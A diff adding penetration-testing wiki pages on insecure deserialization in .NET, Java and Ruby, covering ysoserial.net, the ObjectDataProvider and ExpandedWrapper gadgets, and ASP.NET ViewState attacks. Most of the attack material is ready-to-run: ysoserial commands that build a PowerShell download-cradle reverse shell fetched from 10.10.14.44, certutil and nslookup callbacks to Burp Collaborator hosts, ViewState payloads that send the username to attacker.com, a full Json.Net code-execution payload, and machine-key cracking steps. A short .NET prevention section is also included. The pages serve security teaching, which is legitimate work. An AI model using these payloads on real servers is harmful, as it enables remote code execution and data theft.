+You should remember that even if a service is vulnerable \(because it's insecurely deserializing user input\) you still need to find valid gadgets to exploit the vulnerability. 
+
+The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application.
+
+### References
+
+* JMET talk: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
+* Slides: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
+
+## .Net
+
+.Net is similar to Java regarding how deserialization exploits work: The **exploit** will **abuse gadgets** that **execute** some interesting **code when** an object is **deserialized**.
+
+### Fingerprint
+
+#### WhiteBox
+
+Search the source code for the following terms:
+
+1. `TypeNameHandling`
+2. `JavaScriptTypeResolver`
+
+Look for any serializers where the type is set by a user controlled variable.
+
+#### BlackBox
+
+You can search for the Base64 encoded string **AAEAAAD/////** or any other thing that **may be deserialized** in the back-end and that allows you to control the deserialized type**.** For example, a **JSON** or **XML** containing `TypeObject` or `$type`.
+
+### ysoserial.net
+
+In this case you can use the tool [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) in order to **create the deserialization exploits**. Once downloaded the git repository you should **compile the tool** using Visual Studio for example.
+
+If you want to learn about **how does ysoserial.net creates it's exploit** you can [**check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
+
+The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output`** and **`--plugin`.**
+
+* **`--gadget`** used to indicate the gadget to abuse \(indicate the class/function that will be abused during deserialization to execute commands\).
+*  **`--formatter`**, used to indicated the method to serialized the exploit \(you need to know which library is using the back-end to deserialize the payload and use the same to serialize it\)
+*  **`--output`** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** \(encoding used by default on Windows\) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly \(in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work\)._
+* **`--plugin`** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState
+
+#### More ysoserial.net parameters
+
+* `--minify` will provide a **smaller payload** \(if possible\)
+* `--raf -f Json.Net -c "anything"` This will indicate all the gadgets that can be used with a provided formatter \(`Json.Net` in this case\)
+* `--sf xml` you can **indicate a gadget** \(`-g`\)and ysoserial.net will search for formatters containing "xml" \(case insensitive\)
+
+**ysoserial examples** to create exploits:
+
+```bash
+#Send ping
+ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
+
+#Timing
+#I tried using ping and timeout but there wasn't any difference in the response timing from the web server
+
+#DNS/HTTP request
+ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64
+ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64
+
+#Reverse shell
+##Create shell command in linux
+echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv  -t UTF-16LE | base64 -w0
+##Create exploit using the created B64 shellcode
+ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
+```
+
+**ysoserial.net** has also a **very interesting parameter** that helps to understand better how every exploit works: `--test`  
+If you indicates this parameter **ysoserial.net** will **try** the **exploit locally,** so you can test if your payload will work correctly.  
+This parameter is helpful because if you review the code you will find chucks of code like the following one \(from [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)\):
+
+```java
+            if (inputArgs.Test)
+                {
+                    try
+                    {
+                        SerializersHelper.JsonNet_deserialize(payload);
+                    }
+                    catch (Exception err)
+                    {
+                        Debugging.ShowErrors(inputArgs, err);
+                    }
+                }
+```
+
+This means that in order to test the exploit the code will call [serializersHelper.JsonNet\_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
+
+```java
+public static object JsonNet_deserialize(string str)
+    {
+        Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
+        {
+            TypeNameHandling = TypeNameHandling.Auto
+        });
+        return obj;
+    }
+```
+
+In the **previous code is vulnerable to the exploit created**. So if you find something similar in a .Net application it means that probably that application is vulnerable too.  
+Therefore the **`--test`** parameter allows us to understand **which chunks of code are vulnerable** to the desrialization exploit that **ysoserial.net** can create.
+
+### ViewState
+
+Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-__viewstate-parameter.md)to **execute arbitrary code**.
+
+### **Prevention**
+
+Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this by for example using the `DataContractSerializer` or `XmlSerializer` if at all possible.
+
+Where `JSON.Net` is being used make sure the `TypeNameHandling` is only set to `None`.
+
+```text
+TypeNameHandling = TypeNameHandling.None
+```
+
+If `JavaScriptSerializer` is to be used then do not use it with a `JavaScriptTypeResolver`.
+
+If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. One should be aware that this is still risky as many native .Net types potentially dangerous in themselves. e.g.
+
+```text
+System.IO.FileInfo
+```
+
+`FileInfo` objects that reference files actually on the server can when deserialized, change the properties of those files e.g. to read-only, creating a potential denial of service attack.
+
+Even if you have limited the types that can be deserialised remember that some types have properties that are risky. `System.ComponentModel.DataAnnotations.ValidationException`, for example has a property `Value` of type `Object`. if this type is the type allowed for deserialization then an attacker can set the `Value` property to any object type they choose.
+
+Attackers should be prevented from steering the type that will be instantiated. If this is possible then even `DataContractSerializer` or `XmlSerializer` can be subverted e.g.
+
+```text
+// Action below is dangerous if the attacker can change the data in the database
+var typename = GetTransactionTypeFromDatabase();  
+
+var serializer = new DataContractJsonSerializer(Type.GetType(typename));
+
+var obj = serializer.ReadObject(ms);
+```
+
+Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective.
+
+```text
+var suspectObject = myBinaryFormatter.Deserialize(untrustedData);
+
+//Check below is too late! Execution may have already occurred.
+if (suspectObject is SomeDangerousObjectType)
+{
+    //generate warnings and dispose of suspectObject
+}
+```
+
+For `BinaryFormatter` and `JSON.Net` it is possible to create a safer form of white list control using a custom `SerializationBinder`.
+
+Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. **A deserializer can only instantiate types that it knows about**.
+
+Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example `System.Windows.Data.ObjectDataProvider` used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have this a reference to this assembly in a REST service project that deserializes untrusted data.
+
+### **References**
+
+* Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+* [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html\#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
+* [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
+* [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
+
+## **Ruby**
+
+Ruby has two methods to implement serialization inside the **marshal** library: first method is **dump** that converts object into bytes streams **\(serialize\)**. And the second method is **load** to convert bytes stream to object again \(**deserialize**\).  
+Ruby uses HMAC to sign the serialized object and saves the key on one of the following files:
+
+* config/environment.rb
+* config/initializers/secret\_token.rb
+* config/secrets.yml
+* /proc/self/environ
+
+TODO: Review [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
+
diff --git a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
new file mode 100644
index 00000000..6129cd24
--- /dev/null
+++ b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -0,0 +1,197 @@
+# Basic .Net deserialization \(ObjectDataProvider gadget, ExpandedWrapper, and Json.Net\)
+
+This post is dedicated to **understand how the gadget ObjectDataProvider is exploited** to obtain RCE and **how** the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.
+
+## ObjectDataProvider Gadget
+
+From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.  
+Yeah, it's a weird explanation, so lets see what does this class have that is so interesting:  This class allows to **wrap an arbitrary object**, use _**MethodParameters**_ to **set arbitrary parameters,** and then **use MethodName to call an arbitrary function** of the arbitrary object declared using the arbitrary parameters.  
+Therefore, the arbitrary **object** will **execute** a **function** with **parameters while being deserialized.**
+
+### **How is this possible**
+
+The ObjectDataProvider is defined and implemented in the System.Windows.Data namespace, which is located in the **PresentationFramework.dll** \(_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF_\).
+
+Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --&gt; System.Windows.Data --&gt; ObjectDataProvider --&gt; Method name**
+
+![](../../.gitbook/assets/image%20%28108%29.png)
+
+As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:
+
+![](../../.gitbook/assets/image%20%28183%29.png)
+
+Ok, lets continue seeing what does `this.BeginQuery()` does. `BeginQuery` is overridden by `ObjectDataProvider` and this is what it does:
+
+![](../../.gitbook/assets/image%20%2876%29.png)
+
+Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see what does that execute:
+
+![](../../.gitbook/assets/image%20%28178%29.png)
+
+Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
+
+If you want to check that just setting the _**MethodName**_ **it will be executed**, you can run this code:
+
+```java
+using System.Windows.Data;
+using System.Diagnostics;
+
+namespace ODPCustomSerialExample
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            ObjectDataProvider myODP = new ObjectDataProvider();
+            myODP.ObjectType = typeof(Process);
+            myODP.MethodParameters.Add("cmd.exe");
+            myODP.MethodParameters.Add("/c calc.exe");
+            myODP.MethodName = "Start";
+        }
+    }
+}
+```
+
+Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ****in order to load `System.Windows.Data`
+
+## ExpandedWrapper
+
+Using the previous exploit there will be cases where the **object** is going to be **deserialized  as** an _**ObjectDataProvider**_ **instance** \(for example in DotNetNuke vuln, using XmlSerializer, the object was deserialized using `GetType`\). Then, will have **no knowledge of the object type that is wrapped** in the _ObjectDataProvider_ instance \(`Process` for example\). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
+
+This class allows to s**pecify the object types of the objects that are encapsulated** in a given instance. So, this class can be used to encapsulate a source object \(_ObjectDataProvider_\) into a new object type and provide the properties we need \(_ObjectDataProvider.MethodName_ and _ObjectDataProvider.MethodParameters_\).  
+This is very useful for cases as the one presented before, because we will be able to **wrap** _**ObjectDataProvider**_ **inside an** _**ExpandedWrapper**_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
+
+You can check this wrapper with the following code:
+
+```java
+using System.Windows.Data;
+using System.Diagnostics;
+using System.Data.Services.Internal;
+
+namespace ODPCustomSerialExample
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
+            myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
+            myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
+            myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
+            myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
+            myExpWrap.ProjectedProperty0.MethodName = "Start";
+        }
+    }
+}
+
+```
+
+## Json.Net
+
+In the [official web page](https://www.newtonsoft.com/json) it is indicated that this library allows to **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. So, if we could **deserialize the ObjectDataProvider gadget**, we could cause a **RCE** just deserializing an object.
+
+### Json.Net example
+
+First of all lets see an example on how to **serialize/deserialize** an object using this library:
+
+```java
+using System;
+using Newtonsoft.Json;
+using System.Diagnostics;
+using System.Collections.Generic;
+
+namespace DeserializationTests
+{
+    public class Account
+    {
+        public string Email { get; set; }
+        public bool Active { get; set; }
+        public DateTime CreatedDate { get; set; }
+        public IList<string> Roles { get; set; }
+    }
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            Account account = new Account
+            {
+                Email = "james@example.com",
+                Active = true,
+                CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
+                Roles = new List<string>
+                {
+                    "User",
+                    "Admin"
+                }
+            };
+            //Serialize the object and print it
+            string json = JsonConvert.SerializeObject(account);
+            Console.WriteLine(json);
+            //{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
+            
+            //Deserialize it
+            Account desaccount = JsonConvert.DeserializeObject<Account>(json);
+            Console.WriteLine(desaccount.Email);
+        }
+    }
+}
+```
+
+### Abusing Json.Net
+
+Using [ysoserial.net](https://github.com/pwntester/ysoserial.net) I crated the exploit:
+
+```java
+ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
+{
+    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+    'MethodName':'Start',
+    'MethodParameters':{
+        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+        '$values':['cmd', '/c calc.exe']
+    },
+    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
+}
+```
+
+In this code you can **test the exploit**, just run it and you will see that a calc is executed:
+
+```java
+using System;
+using System.Text;
+using Newtonsoft.Json;
+
+namespace DeserializationTests
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            //Declare exploit
+            string userdata = @"{
+                '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+                'MethodName':'Start',
+                'MethodParameters':{
+                            '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+                    '$values':['cmd', '/c calc.exe']
+                },
+                'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
+            }";
+            //Exploit to base64
+            string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
+
+            //Get data from base64
+            byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
+            //Deserialize data
+            string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
+            object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
+            {
+                TypeNameHandling = TypeNameHandling.Auto
+            });
+        }
+    }
+}
+```
+
+
+
diff --git a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
new file mode 100644
index 00000000..30008d2b
--- /dev/null
+++ b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -0,0 +1,88 @@
+# Basic Java Deserialization \(ObjectInputStream, readObject\)
+
+In this POST it's going to be explained an example using java.io.Serializable.
+
+## Serializable
+
+The Java `Serializable` interface \(`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization \(writing\) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization \(reading\) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). 
+
+Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to b **executed**.  
+In the example, the **readObject function** of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog \(for some reason\) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:**
+
+```java
+import java.io.Serializable;
+import java.io.*;
+
+public class TestDeserialization {
+    interface Animal {
+        public void eat();
+    }
+    //Class must implements Serializable to be serializable
+    public static class Cat implements Animal,Serializable {
+        @Override
+        public void eat() {
+            System.out.println("cat eat fish");
+        }
+    }
+    //Class must implements Serializable to be serializable
+    public static class Dog implements Animal,Serializable {
+        @Override
+        public void eat() {
+            try {
+                Runtime.getRuntime().exec("calc");
+            } catch (IOException e) {
+                e.printStackTrace();
+            }
+            System.out.println("dog eat bone");
+        }
+    }
+    //Class must implements Serializable to be serializable
+    public static class Person implements Serializable {
+        private Animal pet;
+        public Person(Animal pet){
+            this.pet = pet;
+        }
+        //readObject implementation, will call the readObject from ObjectInputStream  and then call pet.eat()
+        private void readObject(java.io.ObjectInputStream stream)
+                throws IOException, ClassNotFoundException {
+            pet = (Animal) stream.readObject();
+            pet.eat();
+        }
+    }
+    public static void GeneratePayload(Object instance, String file)
+            throws Exception {
+        //Serialize the constructed payload and write it to the file
+        File f = new File(file);
+        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
+        out.writeObject(instance);
+        out.flush();
+        out.close();
+    }
+    public static void payloadTest(String file) throws Exception {
+        //Read the written payload and deserialize it
+        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
+        Object obj = in.readObject();
+        System.out.println(obj);
+        in.close();
+    }
+    public static void main(String[] args) throws Exception {
+        // Example to call Person with a Dog
+        Animal animal = new Dog();
+        Person person = new Person(animal);
+        GeneratePayload(person,"test.ser");
+        payloadTest("test.ser");
+        // Example to call Person with a Cat
+        //Animal animal = new Cat();
+        //Person person = new Person(animal);
+        //GeneratePayload(person,"test.ser");
+        //payloadTest("test.ser");
+    }
+}
+```
+
+This example was taken from [https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649](https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649)
+
+### Conclusion
+
+As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**.
+
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
new file mode 100644
index 00000000..514fac15
--- /dev/null
+++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -0,0 +1,179 @@
+# Exploiting \_\_VIEWSTATE parameter
+
+## What is ViewState
+
+**ViewState** is the method that the ASP.NET framework uses by default to p**reserve page and control values between web pages**. When the HTML for the page is rendered, the current state of the page and values that need to be retained during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields.  
+The following properties or combination of properties apply to ViewState information:
+
+* Base64
+  * Can be defined using EnableViewStateMac and ViewStateEncryptionMode attribute set to false
+* Base64 + MAC \(Message Authentication Code\)  Enabled
+  * Can be defined using EnableViewStateMac attribute set to true
+* Base64 + Encrypted
+  * Can be defined using viewStateEncryptionMode attribute set to true
+
+## **Test Cases**
+
+![](../../.gitbook/assets/image%20%2873%29.png)
+
+### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
+
+It is also possible to disable the ViewStateMAC completely by setting the `AspNetEnforceViewStateMac` registry key to zero in:
+
+```text
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
+```
+
+**Identifying ViewState Attributes**
+
+You can try to identify if ViewState is MAC protected by capturing a request containing this parameter with BrupSuite:
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/1.0.png)
+
+If Mac is not used to protect the parameter you can exploit it using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net).
+
+```text
+ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
+```
+
+### Test case 1.5 – Like Test case 1 but the ViewState cookie isn't sent by the server
+
+Developers can **remove ViewState** from becoming part of an HTTP Request \(the user won't receive this cookie\).   
+One may assume that if **ViewState** is **not present**, their implementation is **secure** from any potential vulnerabilities arising with ViewState deserialization.  
+However, that is not the case. If we **add ViewState parameter** to the request body and send our serialized payload created using ysoserial, we will still be able to achieve **code execution** as shown in **Case 1**.
+
+### Test Case: 2 – .Net &lt; 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
+
+In order to **enable ViewState MAC** for a **specific page** we need to make following changes on a specific aspx file:
+
+```bash
+<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
+```
+
+We can also do it for **overall** application by setting it on the **web.config** file as shown below:
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+<system.web>
+<customErrors mode="Off" />
+ <machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
+ <pages enableViewStateMac="true" />
+</system.web>
+</configuration>
+```
+
+As the parameter is MAC protected this time to successfully execute the attack we first need the key used. In this case, BurpSuite will let us know that the parameter is MAC protected:
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/2.0.png)
+
+You can try to use [**Blacklist3r\(AspDotNetWrapper.exe\)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key used.
+
+```
+AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
+
+--encrypteddata : __VIEWSTATE parameter value of the target application
+--modifier : __VIWESTATEGENERATOR parameter value
+```
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/2.1.png)
+
+If you are lucky and the key is found,you can proceed with the attack using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
+
+```text
+ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+
+--generator = {__VIWESTATEGENERATOR parameter value}
+```
+
+In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent** by the server you **don't** need to **provide** the `--generator` parameter **but these ones**:
+
+```bash
+--apppath="/" --path="/hello.aspx"
+```
+
+### Test Case: 3 – .Net &lt; 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true
+
+In this case Burp doesn't find if the parameter is protected with MAC because it doesn't recognise the values. Then, the value is probably encrypted and you will **need the Machine Key to encrypt your payload** to exploit the vulnerability.
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/3.0.png)
+
+**In this case the**  [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module is under development...**
+
+**Prior to .NET 4.5**, ASP.NET can **accept** an **unencrypted** _`__VIEWSTATE`_parameter from the users **even** if **`ViewStateEncryptionMod`**e has been set to _**Always**_. ASP.NET **only checks** the **presence** of the **`__VIEWSTATEENCRYPTED`** parameter in the request. **If one removes this parameter, and sends the unencrypted payload, it will still be processed.**
+
+Threfore, if the Machinekey is known \(e.g. via a directory traversal issue\), [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) command used in the **Case 2**, can be used to perform RCE using ViewState deserialization vulnerability.
+
+* Remove `__VIEWSTATEENCRYPTED` parameter from the request in order to exploit the ViewState deserialization vulnerability, else it will return a Viewstate MAC validation error and exploit will fail as shown in Figure:
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/3.1.png)
+
+### Test Case: 4 – .Net &gt;= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false
+
+We can force the usage of ASP.NET framework by specifying the below parameter inside the web.config file as shown below.
+
+```markup
+<httpRuntime targetFramework="4.5" />
+```
+
+Alternatively, this can be done by specifying the below option inside the `machineKey` paramter of web.config file.
+
+```bash
+compatibilityMode="Framework45"
+```
+
+As in the previous case Burp doesn't identify if the request is MAC protected because the **value is encrypted.** Then, to send a **valid payload the attacker need the key**.
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.0.png)
+
+You can try to use [**Blacklist3r\(AspDotNetWrapper.exe\)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key being used:
+
+```text
+AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
+
+--encrypteddata = {__VIEWSTATE parameter value}
+--IISDirPath = {Directory path of website in IIS}
+--TargetPagePath = {Target page path in application}
+```
+
+For a more detailed description for IISDirPath and TargetPagePath [refer here](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.1.png)
+
+Once a valid Machine key is identified, **the next step is to generate a serialized payload using**  [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
+
+```text
+ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+```
+
+If you have the value of `__VIEWSTATEGENERATOR` you can try to **use** the `--generator` parameter with that value and **omit** the parameters `--path` and `--apppath`
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/4.2.png)
+
+If the ViewState deserialization vulnerability is successfully exploited, an attacker-controlled server will receive an out of band request containing the username.  [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)
+
+### Test Case 6 – ViewStateUserKeys is being used
+
+The **ViewStateUserKey** property can be used to **defend** against a **CSRF attack**. If such a key has been defined in the application and we try to generate the **ViewState** payload with the methods discussed till now, the **payload won’t be processed by the application**.  
+You need to use one more parameter in order to create correctly the payload:
+
+```bash
+--viewstateuserkey="randomstringdefinedintheserver"
+```
+
+### Result of a Successful Exploitation <a id="PoC"></a>
+
+For all the test cases, if the ViewState YSoSerial.Net payload works **successfully** then the server responds with “**500 Internal server error**” having response content “**The state information is invalid for this page and might be corrupted**” and we get the OOB request as shown in Figures below:
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/5.0POC-of-Seccuessful-exploitation.png)
+
+out of band request with the current username
+
+![](https://www.notsosecure.com/wp-content/uploads/2019/06/5.1POC-of-Seccuessful-exploitation.png)
+
+## References
+
